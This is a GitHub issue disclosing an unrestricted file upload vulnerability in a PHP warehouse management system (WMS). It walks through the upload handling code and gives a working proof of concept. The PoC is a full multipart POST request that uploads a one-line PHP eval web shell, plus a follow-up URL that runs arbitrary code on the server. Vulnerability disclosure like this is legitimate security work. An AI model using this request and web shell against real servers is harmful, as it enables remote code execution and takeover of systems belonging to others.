Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

WMS has a file upload code execution vulnerability #14

Closed
huclilu opened this issue Nov 29, 2022 · 0 comments
Closed

WMS has a file upload code execution vulnerability #14

huclilu opened this issue Nov 29, 2022 · 0 comments

Comments

@huclilu
Copy link

huclilu commented Nov 29, 2022

WMS has a file upload code execution vulnerability

Build environment: Apache 2.4.39; MySQL5.0.96; PHP5.3.29

1.in /src/product/addproduct.php,On lines 242-246 of the code

1129qddm

Upfile is a parameter for uploading pictures,

2.Then we come to savenewproduct.php

upfilehddm

The upfile from POST is assigned to $upfile

Then let's look at lines 45-64 of the code

1129upfiledaima

It can be seen that the uploaded files are stored in the upimages directory, and the file naming rules are 1.jpg, 2.jpg, and then add 1

3.Therefore, we can construct a poc to execute the file upload command

POC:

POST /product/savenewproduct.php?flag=1 HTTP/1.1
Host: xxxx
Content-Length: 1507
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wmsvul.test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryONFXfH9gn2T6Gxal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://wmsvul.test/product/addproduct.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qo4cusl0vp4mame43ssakta695
Connection: close

------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="typeid"

0001
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="name"

123123123123
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="encode"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="barcode"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="size"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="unit"

None
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="upperlimit"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="lowerlimit"

10
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="inprice"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="outprice"

123
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2000000
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="upfile"; filename="POC.php"
Content-Type: application/octet-stream

<?php @eval($_GET['ace']);?>
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="jianjie"


------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="submit"

添加
------WebKitFormBoundaryONFXfH9gn2T6Gxal--

Since the uploaded file was not verified, the PHP file was uploaded successfully and was named 1.php

1129uploadsuccess

Then, we access the PHP file to execute the code

POC:

http://wmsvul.test/product/upimages/1.php?ace=phpinfo();

1129phpinfo

@huclilu huclilu closed this as completed Dec 3, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant